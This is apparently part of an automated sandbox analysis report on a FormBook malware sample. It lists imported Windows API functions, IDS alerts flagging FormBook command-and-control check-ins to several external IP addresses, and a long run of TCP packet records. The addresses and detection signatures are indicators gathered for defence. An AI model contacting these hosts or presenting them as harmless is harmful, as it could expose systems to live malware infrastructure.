                                        SHELL32.dllDragQueryPoint, ShellExecuteExW, DragQueryFileW, SHEmptyRecycleBinW, SHBrowseForFolderW, SHGetFolderPathW, SHFileOperationW, SHGetPathFromIDListW, SHGetDesktopFolder, SHGetMalloc, ExtractIconExW, Shell_NotifyIconW, ShellExecuteW, DragFinish
                                        ole32.dllCoTaskMemAlloc, CoTaskMemFree, CLSIDFromString, ProgIDFromCLSID, CLSIDFromProgID, OleSetMenuDescriptor, MkParseDisplayName, OleSetContainedObject, CoCreateInstance, IIDFromString, StringFromGUID2, CreateStreamOnHGlobal, CoInitialize, CoUninitialize, GetRunningObjectTable, CoGetInstanceFromFile, CoGetObject, CoInitializeSecurity, CoCreateInstanceEx, CoSetProxyBlanket
                                        OLEAUT32.dllRegisterTypeLib, LoadTypeLibEx, VariantCopyInd, SysReAllocString, SysFreeString, SafeArrayDestroyDescriptor, SafeArrayDestroyData, SafeArrayUnaccessData, SafeArrayAccessData, SafeArrayAllocData, UnRegisterTypeLib, SafeArrayCreateVector, SysAllocString, SysStringLen, VariantTimeToSystemTime, VarR8FromDec, SafeArrayGetVartype, OleLoadPicture, QueryPathOfRegTypeLib, VariantCopy, VariantClear, CreateDispTypeInfo, CreateStdDispatch, DispCallFunc, VariantChangeType, SafeArrayAllocDescriptorEx, VariantInit

                                        Possible Origin

                                        Language of compilation systemCountry where language is spokenMap
                                        EnglishGreat Britain

                                        Network Behavior

                                        Suricata IDS Alerts

                                        TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                                        2024-09-11T10:09:08.800408+02002050745ET MALWARE FormBook CnC Checkin (GET) M51192.168.2.224916147.57.185.22780TCP
                                        2024-09-11T10:09:27.129558+02002050745ET MALWARE FormBook CnC Checkin (GET) M51192.168.2.224916689.58.49.180TCP
                                        2024-09-11T10:09:58.325132+02002050745ET MALWARE FormBook CnC Checkin (GET) M51192.168.2.2249170154.23.184.24080TCP
                                        2024-09-11T10:10:11.711785+02002050745ET MALWARE FormBook CnC Checkin (GET) M51192.168.2.224917485.159.66.9380TCP
                                        2024-09-11T10:10:25.063039+02002050745ET MALWARE FormBook CnC Checkin (GET) M51192.168.2.2249178185.173.111.7680TCP
                                        2024-09-11T10:10:38.517261+02002050745ET MALWARE FormBook CnC Checkin (GET) M51192.168.2.2249182203.161.43.22880TCP
                                        2024-09-11T10:10:51.794228+02002050745ET MALWARE FormBook CnC Checkin (GET) M51192.168.2.2249186161.97.168.24580TCP
                                        2024-09-11T10:11:05.390377+02002050745ET MALWARE FormBook CnC Checkin (GET) M51192.168.2.2249190172.96.191.3980TCP
                                        2024-09-11T10:11:18.744513+02002050745ET MALWARE FormBook CnC Checkin (GET) M51192.168.2.2249194104.21.20.12580TCP
                                        2024-09-11T10:11:32.596650+02002050745ET MALWARE FormBook CnC Checkin (GET) M51192.168.2.224919843.242.202.16980TCP

                                        Network Port Distribution

                                        TCP Packets

                                        TimestampSource PortDest PortSource IPDest IP
                                        Sep 11, 2024 10:09:07.862241983 CEST4916180192.168.2.2247.57.185.227
                                        Sep 11, 2024 10:09:07.867805004 CEST804916147.57.185.227192.168.2.22
                                        Sep 11, 2024 10:09:07.867985964 CEST4916180192.168.2.2247.57.185.227
                                        Sep 11, 2024 10:09:07.874480009 CEST4916180192.168.2.2247.57.185.227
                                        Sep 11, 2024 10:09:07.879874945 CEST804916147.57.185.227192.168.2.22
                                        Sep 11, 2024 10:09:08.800055027 CEST804916147.57.185.227192.168.2.22
                                        Sep 11, 2024 10:09:08.800116062 CEST804916147.57.185.227192.168.2.22
                                        Sep 11, 2024 10:09:08.800407887 CEST4916180192.168.2.2247.57.185.227
                                        Sep 11, 2024 10:09:08.803030968 CEST4916180192.168.2.2247.57.185.227
                                        Sep 11, 2024 10:09:08.807971954 CEST804916147.57.185.227192.168.2.22
                                        Sep 11, 2024 10:09:11.260441065 CEST4916280192.168.2.2245.33.6.223
                                        Sep 11, 2024 10:09:11.265423059 CEST804916245.33.6.223192.168.2.22
                                        Sep 11, 2024 10:09:11.265491962 CEST4916280192.168.2.2245.33.6.223
                                        Sep 11, 2024 10:09:11.265733957 CEST4916280192.168.2.2245.33.6.223
                                        Sep 11, 2024 10:09:11.270541906 CEST804916245.33.6.223192.168.2.22
                                        Sep 11, 2024 10:09:11.771234035 CEST804916245.33.6.223192.168.2.22
                                        Sep 11, 2024 10:09:11.771295071 CEST804916245.33.6.223192.168.2.22
                                        Sep 11, 2024 10:09:11.771327019 CEST804916245.33.6.223192.168.2.22
                                        Sep 11, 2024 10:09:11.771356106 CEST4916280192.168.2.2245.33.6.223
                                        Sep 11, 2024 10:09:11.771358967 CEST804916245.33.6.223192.168.2.22
                                        Sep 11, 2024 10:09:11.771409988 CEST4916280192.168.2.2245.33.6.223
                                        Sep 11, 2024 10:09:11.771409988 CEST4916280192.168.2.2245.33.6.223
                                        Sep 11, 2024 10:09:11.771410942 CEST4916280192.168.2.2245.33.6.223
                                        Sep 11, 2024 10:09:11.771429062 CEST804916245.33.6.223192.168.2.22
                                        Sep 11, 2024 10:09:11.771462917 CEST804916245.33.6.223192.168.2.22
                                        Sep 11, 2024 10:09:11.771476984 CEST4916280192.168.2.2245.33.6.223
                                        Sep 11, 2024 10:09:11.771497965 CEST804916245.33.6.223192.168.2.22
                                        Sep 11, 2024 10:09:11.771512032 CEST4916280192.168.2.2245.33.6.223
                                        Sep 11, 2024 10:09:11.771532059 CEST804916245.33.6.223192.168.2.22
                                        Sep 11, 2024 10:09:11.771543026 CEST4916280192.168.2.2245.33.6.223
                                        Sep 11, 2024 10:09:11.771568060 CEST804916245.33.6.223192.168.2.22
                                        Sep 11, 2024 10:09:11.771579981 CEST4916280192.168.2.2245.33.6.223
                                        Sep 11, 2024 10:09:11.771601915 CEST804916245.33.6.223192.168.2.22
                                        Sep 11, 2024 10:09:11.771614075 CEST4916280192.168.2.2245.33.6.223
                                        Sep 11, 2024 10:09:11.771648884 CEST4916280192.168.2.2245.33.6.223
                                        Sep 11, 2024 10:09:11.776653051 CEST804916245.33.6.223192.168.2.22
                                        Sep 11, 2024 10:09:11.776689053 CEST804916245.33.6.223192.168.2.22
                                        Sep 11, 2024 10:09:11.776726961 CEST4916280192.168.2.2245.33.6.223
                                        Sep 11, 2024 10:09:11.776741028 CEST804916245.33.6.223192.168.2.22
                                        Sep 11, 2024 10:09:11.776741982 CEST4916280192.168.2.2245.33.6.223
                                        Sep 11, 2024 10:09:11.776771069 CEST804916245.33.6.223192.168.2.22
                                        Sep 11, 2024 10:09:11.776786089 CEST4916280192.168.2.2245.33.6.223
                                        Sep 11, 2024 10:09:11.776818037 CEST4916280192.168.2.2245.33.6.223
                                        Sep 11, 2024 10:09:11.857469082 CEST804916245.33.6.223192.168.2.22
                                        Sep 11, 2024 10:09:11.857517004 CEST804916245.33.6.223192.168.2.22
                                        Sep 11, 2024 10:09:11.857553005 CEST804916245.33.6.223192.168.2.22
                                        Sep 11, 2024 10:09:11.857556105 CEST4916280192.168.2.2245.33.6.223
                                        Sep 11, 2024 10:09:11.857570887 CEST4916280192.168.2.2245.33.6.223
                                        Sep 11, 2024 10:09:11.857599020 CEST4916280192.168.2.2245.33.6.223
                                        Sep 11, 2024 10:09:11.857613087 CEST804916245.33.6.223192.168.2.22
                                        Sep 11, 2024 10:09:11.857647896 CEST804916245.33.6.223192.168.2.22
                                        Sep 11, 2024 10:09:11.857666969 CEST4916280192.168.2.2245.33.6.223
                                        Sep 11, 2024 10:09:11.857681990 CEST804916245.33.6.223192.168.2.22
                                        Sep 11, 2024 10:09:11.857693911 CEST4916280192.168.2.2245.33.6.223
                                        Sep 11, 2024 10:09:11.857717037 CEST804916245.33.6.223192.168.2.22
                                        Sep 11, 2024 10:09:11.857732058 CEST4916280192.168.2.2245.33.6.223
                                        Sep 11, 2024 10:09:11.857753038 CEST804916245.33.6.223192.168.2.22
                                        Sep 11, 2024 10:09:11.857759953 CEST4916280192.168.2.2245.33.6.223
                                        Sep 11, 2024 10:09:11.857800007 CEST4916280192.168.2.2245.33.6.223
                                        Sep 11, 2024 10:09:11.858422041 CEST804916245.33.6.223192.168.2.22
                                        Sep 11, 2024 10:09:11.858458996 CEST804916245.33.6.223192.168.2.22
                                        Sep 11, 2024 10:09:11.858468056 CEST4916280192.168.2.2245.33.6.223
                                        Sep 11, 2024 10:09:11.858495951 CEST804916245.33.6.223192.168.2.22
                                        Sep 11, 2024 10:09:11.858501911 CEST4916280192.168.2.2245.33.6.223
                                        Sep 11, 2024 10:09:11.858529091 CEST804916245.33.6.223192.168.2.22
                                        Sep 11, 2024 10:09:11.858537912 CEST4916280192.168.2.2245.33.6.223
                                        Sep 11, 2024 10:09:11.858563900 CEST804916245.33.6.223192.168.2.22
                                        Sep 11, 2024 10:09:11.858573914 CEST4916280192.168.2.2245.33.6.223
                                        Sep 11, 2024 10:09:11.858604908 CEST4916280192.168.2.2245.33.6.223
                                        Sep 11, 2024 10:09:11.859265089 CEST804916245.33.6.223192.168.2.22
                                        Sep 11, 2024 10:09:11.859317064 CEST4916280192.168.2.2245.33.6.223
                                        Sep 11, 2024 10:09:11.859328032 CEST804916245.33.6.223192.168.2.22
                                        Sep 11, 2024 10:09:11.859375000 CEST4916280192.168.2.2245.33.6.223
                                        Sep 11, 2024 10:09:11.859383106 CEST804916245.33.6.223192.168.2.22
                                        Sep 11, 2024 10:09:11.859441042 CEST804916245.33.6.223192.168.2.22
                                        Sep 11, 2024 10:09:11.859447956 CEST4916280192.168.2.2245.33.6.223
                                        Sep 11, 2024 10:09:11.859477997 CEST804916245.33.6.223192.168.2.22
                                        Sep 11, 2024 10:09:11.859486103 CEST4916280192.168.2.2245.33.6.223
                                        Sep 11, 2024 10:09:11.859525919 CEST4916280192.168.2.2245.33.6.223
                                        Sep 11, 2024 10:09:11.859570980 CEST4916280192.168.2.2245.33.6.223
                                        Sep 11, 2024 10:09:11.860212088 CEST804916245.33.6.223192.168.2.22
                                        Sep 11, 2024 10:09:11.860266924 CEST4916280192.168.2.2245.33.6.223
                                        Sep 11, 2024 10:09:11.860291004 CEST804916245.33.6.223192.168.2.22
                                        Sep 11, 2024 10:09:11.860326052 CEST804916245.33.6.223192.168.2.22
                                        Sep 11, 2024 10:09:11.860342026 CEST4916280192.168.2.2245.33.6.223
                                        Sep 11, 2024 10:09:11.860359907 CEST804916245.33.6.223192.168.2.22
                                        Sep 11, 2024 10:09:11.860369921 CEST4916280192.168.2.2245.33.6.223
                                        Sep 11, 2024 10:09:11.860395908 CEST804916245.33.6.223192.168.2.22
                                        Sep 11, 2024 10:09:11.860405922 CEST4916280192.168.2.2245.33.6.223
                                        Sep 11, 2024 10:09:11.860439062 CEST4916280192.168.2.2245.33.6.223
                                        Sep 11, 2024 10:09:11.860949993 CEST804916245.33.6.223192.168.2.22
                                        Sep 11, 2024 10:09:11.860996008 CEST4916280192.168.2.2245.33.6.223
                                        Sep 11, 2024 10:09:11.943645954 CEST804916245.33.6.223192.168.2.22
                                        Sep 11, 2024 10:09:11.943715096 CEST804916245.33.6.223192.168.2.22
                                        Sep 11, 2024 10:09:11.943752050 CEST804916245.33.6.223192.168.2.22
                                        Sep 11, 2024 10:09:11.943789005 CEST804916245.33.6.223192.168.2.22
                                        Sep 11, 2024 10:09:11.943824053 CEST804916245.33.6.223192.168.2.22
                                        Sep 11, 2024 10:09:11.943856955 CEST804916245.33.6.223192.168.2.22
                                        Sep 11, 2024 10:09:11.943871975 CEST4916280192.168.2.2245.33.6.223
                                        Sep 11, 2024 10:09:11.943892956 CEST804916245.33.6.223192.168.2.22
                                        Sep 11, 2024 10:09:11.943926096 CEST804916245.33.6.223192.168.2.22
                                        Sep 11, 2024 10:09:11.943959951 CEST804916245.33.6.223192.168.2.22
                                        Sep 11, 2024 10:09:11.943986893 CEST4916280192.168.2.2245.33.6.223
                                        Sep 11, 2024 10:09:11.943986893 CEST4916280192.168.2.2245.33.6.223
                                        Sep 11, 2024 10:09:11.943986893 CEST4916280192.168.2.2245.33.6.223
                                        Sep 11, 2024 10:09:11.943988085 CEST4916280192.168.2.2245.33.6.223
                                        Sep 11, 2024 10:09:11.943988085 CEST4916280192.168.2.2245.33.6.223
                                        Sep 11, 2024 10:09:11.943988085 CEST4916280192.168.2.2245.33.6.223
                                        Sep 11, 2024 10:09:11.943988085 CEST4916280192.168.2.2245.33.6.223
                                        Sep 11, 2024 10:09:11.943998098 CEST804916245.33.6.223192.168.2.22
                                        Sep 11, 2024 10:09:11.944040060 CEST4916280192.168.2.2245.33.6.223
                                        Sep 11, 2024 10:09:11.944040060 CEST4916280192.168.2.2245.33.6.223
                                        Sep 11, 2024 10:09:11.944710970 CEST804916245.33.6.223192.168.2.22
                                        Sep 11, 2024 10:09:11.944761038 CEST804916245.33.6.223192.168.2.22
                                        Sep 11, 2024 10:09:11.944777966 CEST4916280192.168.2.2245.33.6.223
                                        Sep 11, 2024 10:09:11.944797039 CEST804916245.33.6.223192.168.2.22
                                        Sep 11, 2024 10:09:11.944804907 CEST4916280192.168.2.2245.33.6.223
                                        Sep 11, 2024 10:09:11.944834948 CEST804916245.33.6.223192.168.2.22
                                        Sep 11, 2024 10:09:11.944860935 CEST4916280192.168.2.2245.33.6.223
                                        Sep 11, 2024 10:09:11.944874048 CEST804916245.33.6.223192.168.2.22
                                        Sep 11, 2024 10:09:11.944881916 CEST4916280192.168.2.2245.33.6.223
                                        Sep 11, 2024 10:09:11.944935083 CEST4916280192.168.2.2245.33.6.223
                                        Sep 11, 2024 10:09:11.945108891 CEST804916245.33.6.223192.168.2.22
                                        Sep 11, 2024 10:09:11.945162058 CEST804916245.33.6.223192.168.2.22
                                        Sep 11, 2024 10:09:11.945169926 CEST4916280192.168.2.2245.33.6.223
                                        Sep 11, 2024 10:09:11.945197105 CEST804916245.33.6.223192.168.2.22
                                        Sep 11, 2024 10:09:11.945214033 CEST4916280192.168.2.2245.33.6.223
                                        Sep 11, 2024 10:09:11.945231915 CEST804916245.33.6.223192.168.2.22
                                        Sep 11, 2024 10:09:11.945254087 CEST4916280192.168.2.2245.33.6.223
                                        Sep 11, 2024 10:09:11.945265055 CEST804916245.33.6.223192.168.2.22
                                        Sep 11, 2024 10:09:11.945272923 CEST4916280192.168.2.2245.33.6.223
                                        Sep 11, 2024 10:09:11.945300102 CEST804916245.33.6.223192.168.2.22
                                        Sep 11, 2024 10:09:11.945316076 CEST4916280192.168.2.2245.33.6.223
                                        Sep 11, 2024 10:09:11.945338964 CEST4916280192.168.2.2245.33.6.223
                                        Sep 11, 2024 10:09:11.945878029 CEST804916245.33.6.223192.168.2.22
                                        Sep 11, 2024 10:09:11.945930958 CEST804916245.33.6.223192.168.2.22
                                        Sep 11, 2024 10:09:11.945939064 CEST4916280192.168.2.2245.33.6.223
                                        Sep 11, 2024 10:09:11.945966005 CEST804916245.33.6.223192.168.2.22
                                        Sep 11, 2024 10:09:11.945983887 CEST4916280192.168.2.2245.33.6.223
                                        Sep 11, 2024 10:09:11.946000099 CEST804916245.33.6.223192.168.2.22
                                        Sep 11, 2024 10:09:11.946023941 CEST4916280192.168.2.2245.33.6.223
                                        Sep 11, 2024 10:09:11.946034908 CEST804916245.33.6.223192.168.2.22
                                        Sep 11, 2024 10:09:11.946043968 CEST4916280192.168.2.2245.33.6.223
                                        Sep 11, 2024 10:09:11.946072102 CEST804916245.33.6.223192.168.2.22
                                        Sep 11, 2024 10:09:11.946091890 CEST4916280192.168.2.2245.33.6.223
                                        Sep 11, 2024 10:09:11.946108103 CEST804916245.33.6.223192.168.2.22
                                        Sep 11, 2024 10:09:11.946130037 CEST4916280192.168.2.2245.33.6.223
                                        Sep 11, 2024 10:09:11.946157932 CEST4916280192.168.2.2245.33.6.223
                                        Sep 11, 2024 10:09:11.946741104 CEST804916245.33.6.223192.168.2.22
                                        Sep 11, 2024 10:09:11.946791887 CEST804916245.33.6.223192.168.2.22
                                        Sep 11, 2024 10:09:11.946799040 CEST4916280192.168.2.2245.33.6.223
                                        Sep 11, 2024 10:09:11.946826935 CEST804916245.33.6.223192.168.2.22
                                        Sep 11, 2024 10:09:11.946845055 CEST4916280192.168.2.2245.33.6.223
                                        Sep 11, 2024 10:09:11.946861982 CEST804916245.33.6.223192.168.2.22
                                        Sep 11, 2024 10:09:11.946887970 CEST4916280192.168.2.2245.33.6.223
                                        Sep 11, 2024 10:09:11.946904898 CEST804916245.33.6.223192.168.2.22
                                        Sep 11, 2024 10:09:11.946938038 CEST4916280192.168.2.2245.33.6.223
                                        Sep 11, 2024 10:09:11.946938992 CEST804916245.33.6.223192.168.2.22
                                        Sep 11, 2024 10:09:11.946959019 CEST4916280192.168.2.2245.33.6.223
                                        Sep 11, 2024 10:09:11.946976900 CEST804916245.33.6.223192.168.2.22
                                        Sep 11, 2024 10:09:11.947001934 CEST4916280192.168.2.2245.33.6.223
                                        Sep 11, 2024 10:09:11.947020054 CEST4916280192.168.2.2245.33.6.223
                                        Sep 11, 2024 10:09:11.947649002 CEST804916245.33.6.223192.168.2.22
                                        Sep 11, 2024 10:09:11.947700977 CEST804916245.33.6.223192.168.2.22
                                        Sep 11, 2024 10:09:11.947710037 CEST4916280192.168.2.2245.33.6.223
                                        Sep 11, 2024 10:09:11.947736025 CEST804916245.33.6.223192.168.2.22
                                        Sep 11, 2024 10:09:11.947752953 CEST4916280192.168.2.2245.33.6.223
                                        Sep 11, 2024 10:09:11.947771072 CEST804916245.33.6.223192.168.2.22
                                        Sep 11, 2024 10:09:11.947797060 CEST4916280192.168.2.2245.33.6.223
                                        Sep 11, 2024 10:09:11.947805882 CEST804916245.33.6.223192.168.2.22
                                        Sep 11, 2024 10:09:11.947819948 CEST4916280192.168.2.2245.33.6.223
                                        Sep 11, 2024 10:09:11.947839975 CEST804916245.33.6.223192.168.2.22
                                        Sep 11, 2024 10:09:11.947856903 CEST4916280192.168.2.2245.33.6.223
                                        Sep 11, 2024 10:09:11.947875023 CEST804916245.33.6.223192.168.2.22
                                        Sep 11, 2024 10:09:11.947895050 CEST4916280192.168.2.2245.33.6.223
                                        Sep 11, 2024 10:09:11.947930098 CEST4916280192.168.2.2245.33.6.223
                                        Sep 11, 2024 10:09:11.948884964 CEST804916245.33.6.223192.168.2.22
                                        Sep 11, 2024 10:09:11.948919058 CEST804916245.33.6.223192.168.2.22
                                        Sep 11, 2024 10:09:11.948945045 CEST4916280192.168.2.2245.33.6.223
                                        Sep 11, 2024 10:09:11.948978901 CEST4916280192.168.2.2245.33.6.223
                                        Sep 11, 2024 10:09:12.029851913 CEST804916245.33.6.223192.168.2.22
                                        Sep 11, 2024 10:09:12.029925108 CEST804916245.33.6.223192.168.2.22
                                        Sep 11, 2024 10:09:12.029961109 CEST804916245.33.6.223192.168.2.22
                                        Sep 11, 2024 10:09:12.030014038 CEST804916245.33.6.223192.168.2.22
                                        Sep 11, 2024 10:09:12.030049086 CEST804916245.33.6.223192.168.2.22
                                        Sep 11, 2024 10:09:12.030072927 CEST4916280192.168.2.2245.33.6.223
                                        Sep 11, 2024 10:09:12.030072927 CEST4916280192.168.2.2245.33.6.223
                                        Sep 11, 2024 10:09:12.030072927 CEST4916280192.168.2.2245.33.6.223
                                        Sep 11, 2024 10:09:12.030072927 CEST4916280192.168.2.2245.33.6.223
                                        Sep 11, 2024 10:09:12.030098915 CEST804916245.33.6.223192.168.2.22
                                        Sep 11, 2024 10:09:12.030134916 CEST804916245.33.6.223192.168.2.22
                                        Sep 11, 2024 10:09:12.030162096 CEST4916280192.168.2.2245.33.6.223
                                        Sep 11, 2024 10:09:12.030162096 CEST4916280192.168.2.2245.33.6.223
                                        Sep 11, 2024 10:09:12.030169010 CEST804916245.33.6.223192.168.2.22
                                        Sep 11, 2024 10:09:12.030183077 CEST4916280192.168.2.2245.33.6.223
                                        Sep 11, 2024 10:09:12.030214071 CEST804916245.33.6.223192.168.2.22
                                        Sep 11, 2024 10:09:12.030214071 CEST4916280192.168.2.2245.33.6.223
                                        Sep 11, 2024 10:09:12.030261993 CEST4916280192.168.2.2245.33.6.223
                                        Sep 11, 2024 10:09:12.030267954 CEST804916245.33.6.223192.168.2.22
                                        Sep 11, 2024 10:09:12.030323982 CEST804916245.33.6.223192.168.2.22
                                        Sep 11, 2024 10:09:12.030327082 CEST4916280192.168.2.2245.33.6.223
                                        Sep 11, 2024 10:09:12.030360937 CEST804916245.33.6.223192.168.2.22
                                        Sep 11, 2024 10:09:12.030380964 CEST4916280192.168.2.2245.33.6.223
                                        Sep 11, 2024 10:09:12.030417919 CEST804916245.33.6.223192.168.2.22
                                        Sep 11, 2024 10:09:12.030421972 CEST4916280192.168.2.2245.33.6.223
                                        Sep 11, 2024 10:09:12.030452967 CEST804916245.33.6.223192.168.2.22
                                        Sep 11, 2024 10:09:12.030471087 CEST4916280192.168.2.2245.33.6.223
                                        Sep 11, 2024 10:09:12.030494928 CEST4916280192.168.2.2245.33.6.223
                                        Sep 11, 2024 10:09:12.030505896 CEST804916245.33.6.223192.168.2.22
                                        Sep 11, 2024 10:09:12.030539036 CEST804916245.33.6.223192.168.2.22
                                        Sep 11, 2024 10:09:12.030561924 CEST4916280192.168.2.2245.33.6.223
                                        Sep 11, 2024 10:09:12.030575037 CEST804916245.33.6.223192.168.2.22
                                        Sep 11, 2024 10:09:12.030586004 CEST4916280192.168.2.2245.33.6.223
                                        Sep 11, 2024 10:09:12.030610085 CEST804916245.33.6.223192.168.2.22
                                        Sep 11, 2024 10:09:12.030627966 CEST4916280192.168.2.2245.33.6.223
                                        Sep 11, 2024 10:09:12.030644894 CEST804916245.33.6.223192.168.2.22
                                        Sep 11, 2024 10:09:12.030678034 CEST4916280192.168.2.2245.33.6.223
                                        Sep 11, 2024 10:09:12.030678034 CEST804916245.33.6.223192.168.2.22
                                        Sep 11, 2024 10:09:12.030700922 CEST4916280192.168.2.2245.33.6.223
                                        Sep 11, 2024 10:09:12.030711889 CEST804916245.33.6.223192.168.2.22
                                        Sep 11, 2024 10:09:12.030723095 CEST4916280192.168.2.2245.33.6.223
                                        Sep 11, 2024 10:09:12.030745983 CEST804916245.33.6.223192.168.2.22
                                        Sep 11, 2024 10:09:12.030762911 CEST4916280192.168.2.2245.33.6.223
                                        Sep 11, 2024 10:09:12.030777931 CEST804916245.33.6.223192.168.2.22
                                        Sep 11, 2024 10:09:12.030801058 CEST4916280192.168.2.2245.33.6.223
                                        Sep 11, 2024 10:09:12.030810118 CEST804916245.33.6.223192.168.2.22
                                        Sep 11, 2024 10:09:12.030819893 CEST4916280192.168.2.2245.33.6.223
                                        Sep 11, 2024 10:09:12.030843973 CEST804916245.33.6.223192.168.2.22
                                        Sep 11, 2024 10:09:12.030860901 CEST4916280192.168.2.2245.33.6.223
                                        Sep 11, 2024 10:09:12.030878067 CEST804916245.33.6.223192.168.2.22
                                        Sep 11, 2024 10:09:12.030894995 CEST4916280192.168.2.2245.33.6.223
                                        Sep 11, 2024 10:09:12.030914068 CEST804916245.33.6.223192.168.2.22
                                        Sep 11, 2024 10:09:12.030935049 CEST4916280192.168.2.2245.33.6.223
                                        Sep 11, 2024 10:09:12.030946970 CEST804916245.33.6.223192.168.2.22
                                        Sep 11, 2024 10:09:12.030972004 CEST4916280192.168.2.2245.33.6.223
                                        Sep 11, 2024 10:09:12.030982971 CEST804916245.33.6.223192.168.2.22
                                        Sep 11, 2024 10:09:12.030994892 CEST4916280192.168.2.2245.33.6.223
                                        Sep 11, 2024 10:09:12.031019926 CEST804916245.33.6.223192.168.2.22
                                        Sep 11, 2024 10:09:12.031032085 CEST4916280192.168.2.2245.33.6.223
                                        Sep 11, 2024 10:09:12.031054974 CEST804916245.33.6.223192.168.2.22
                                        Sep 11, 2024 10:09:12.031073093 CEST4916280192.168.2.2245.33.6.223
                                        Sep 11, 2024 10:09:12.031105995 CEST804916245.33.6.223192.168.2.22
                                        Sep 11, 2024 10:09:12.031111956 CEST4916280192.168.2.2245.33.6.223
                                        Sep 11, 2024 10:09:12.031140089 CEST804916245.33.6.223192.168.2.22
                                        Sep 11, 2024 10:09:12.031160116 CEST4916280192.168.2.2245.33.6.223
                                        Sep 11, 2024 10:09:12.031183004 CEST4916280192.168.2.2245.33.6.223
                                        Sep 11, 2024 10:09:12.031192064 CEST804916245.33.6.223192.168.2.22
                                        Sep 11, 2024 10:09:12.031244040 CEST4916280192.168.2.2245.33.6.223
                                        Sep 11, 2024 10:09:12.031245947 CEST804916245.33.6.223192.168.2.22
                                        Sep 11, 2024 10:09:12.031280994 CEST804916245.33.6.223192.168.2.22
                                        Sep 11, 2024 10:09:12.031296968 CEST4916280192.168.2.2245.33.6.223
                                        Sep 11, 2024 10:09:12.031313896 CEST804916245.33.6.223192.168.2.22
                                        Sep 11, 2024 10:09:12.031347990 CEST804916245.33.6.223192.168.2.22
                                        Sep 11, 2024 10:09:12.031354904 CEST4916280192.168.2.2245.33.6.223
                                        Sep 11, 2024 10:09:12.031356096 CEST4916280192.168.2.2245.33.6.223
                                        Sep 11, 2024 10:09:12.031411886 CEST804916245.33.6.223192.168.2.22
                                        Sep 11, 2024 10:09:12.031430960 CEST4916280192.168.2.2245.33.6.223
                                        Sep 11, 2024 10:09:12.031450033 CEST804916245.33.6.223192.168.2.22
                                        Sep 11, 2024 10:09:12.031464100 CEST4916280192.168.2.2245.33.6.223
                                        Sep 11, 2024 10:09:12.031486034 CEST804916245.33.6.223192.168.2.22
                                        Sep 11, 2024 10:09:12.031495094 CEST4916280192.168.2.2245.33.6.223
                                        Sep 11, 2024 10:09:12.031518936 CEST804916245.33.6.223192.168.2.22
                                        Sep 11, 2024 10:09:12.031531096 CEST4916280192.168.2.2245.33.6.223
                                        Sep 11, 2024 10:09:12.031553030 CEST804916245.33.6.223192.168.2.22
                                        Sep 11, 2024 10:09:12.031574965 CEST4916280192.168.2.2245.33.6.223
                                        Sep 11, 2024 10:09:12.031585932 CEST804916245.33.6.223192.168.2.22
                                        Sep 11, 2024 10:09:12.031598091 CEST4916280192.168.2.2245.33.6.223
                                        Sep 11, 2024 10:09:12.031620026 CEST804916245.33.6.223192.168.2.22
                                        Sep 11, 2024 10:09:12.031636953 CEST4916280192.168.2.2245.33.6.223
                                        Sep 11, 2024 10:09:12.031652927 CEST804916245.33.6.223192.168.2.22
                                        Sep 11, 2024 10:09:12.031667948 CEST4916280192.168.2.2245.33.6.223
                                        Sep 11, 2024 10:09:12.031686068 CEST804916245.33.6.223192.168.2.22
                                        Sep 11, 2024 10:09:12.031691074 CEST4916280192.168.2.2245.33.6.223
                                        Sep 11, 2024 10:09:12.031719923 CEST804916245.33.6.223192.168.2.22
                                        Sep 11, 2024 10:09:12.031738043 CEST4916280192.168.2.2245.33.6.223
                                        Sep 11, 2024 10:09:12.031754017 CEST804916245.33.6.223192.168.2.22
                                        Sep 11, 2024 10:09:12.031779051 CEST4916280192.168.2.2245.33.6.223
                                        Sep 11, 2024 10:09:12.031785965 CEST804916245.33.6.223192.168.2.22
                                        Sep 11, 2024 10:09:12.031799078 CEST4916280192.168.2.2245.33.6.223
                                        Sep 11, 2024 10:09:12.031820059 CEST804916245.33.6.223192.168.2.22
                                        Sep 11, 2024 10:09:12.031836033 CEST4916280192.168.2.2245.33.6.223
                                        Sep 11, 2024 10:09:12.031852961 CEST804916245.33.6.223192.168.2.22
                                        Sep 11, 2024 10:09:12.031866074 CEST4916280192.168.2.2245.33.6.223
                                        Sep 11, 2024 10:09:12.031888962 CEST804916245.33.6.223192.168.2.22
                                        Sep 11, 2024 10:09:12.031917095 CEST4916280192.168.2.2245.33.6.223
                                        Sep 11, 2024 10:09:12.031923056 CEST804916245.33.6.223192.168.2.22
                                        Sep 11, 2024 10:09:12.031939983 CEST4916280192.168.2.2245.33.6.223
                                        Sep 11, 2024 10:09:12.031958103 CEST804916245.33.6.223192.168.2.22
                                        Sep 11, 2024 10:09:12.031971931 CEST4916280192.168.2.2245.33.6.223
                                        Sep 11, 2024 10:09:12.031987906 CEST804916245.33.6.223192.168.2.22
                                        Sep 11, 2024 10:09:12.032002926 CEST4916280192.168.2.2245.33.6.223
                                        Sep 11, 2024 10:09:12.032032013 CEST4916280192.168.2.2245.33.6.223
                                        Sep 11, 2024 10:09:12.037345886 CEST804916245.33.6.223192.168.2.22
                                        Sep 11, 2024 10:09:12.037400007 CEST804916245.33.6.223192.168.2.22
                                        Sep 11, 2024 10:09:12.037415028 CEST4916280192.168.2.2245.33.6.223
                                        Sep 11, 2024 10:09:12.037439108 CEST804916245.33.6.223192.168.2.22
                                        Sep 11, 2024 10:09:12.037452936 CEST4916280192.168.2.2245.33.6.223
                                        Sep 11, 2024 10:09:12.037472963 CEST804916245.33.6.223192.168.2.22
                                        Sep 11, 2024 10:09:12.037489891 CEST4916280192.168.2.2245.33.6.223
                                        Sep 11, 2024 10:09:12.037508011 CEST804916245.33.6.223192.168.2.22
                                        Sep 11, 2024 10:09:12.037524939 CEST4916280192.168.2.2245.33.6.223
                                        Sep 11, 2024 10:09:12.037542105 CEST804916245.33.6.223192.168.2.22
                                        Sep 11, 2024 10:09:12.037555933 CEST4916280192.168.2.2245.33.6.223
                                        Sep 11, 2024 10:09:12.037579060 CEST804916245.33.6.223192.168.2.22
                                        Sep 11, 2024 10:09:12.037591934 CEST4916280192.168.2.2245.33.6.223
                                        Sep 11, 2024 10:09:12.037611008 CEST804916245.33.6.223192.168.2.22
                                        Sep 11, 2024 10:09:12.037627935 CEST4916280192.168.2.2245.33.6.223
                                        Sep 11, 2024 10:09:12.037645102 CEST804916245.33.6.223192.168.2.22
                                        Sep 11, 2024 10:09:12.037663937 CEST4916280192.168.2.2245.33.6.223
                                        Sep 11, 2024 10:09:12.037693977 CEST4916280192.168.2.2245.33.6.223
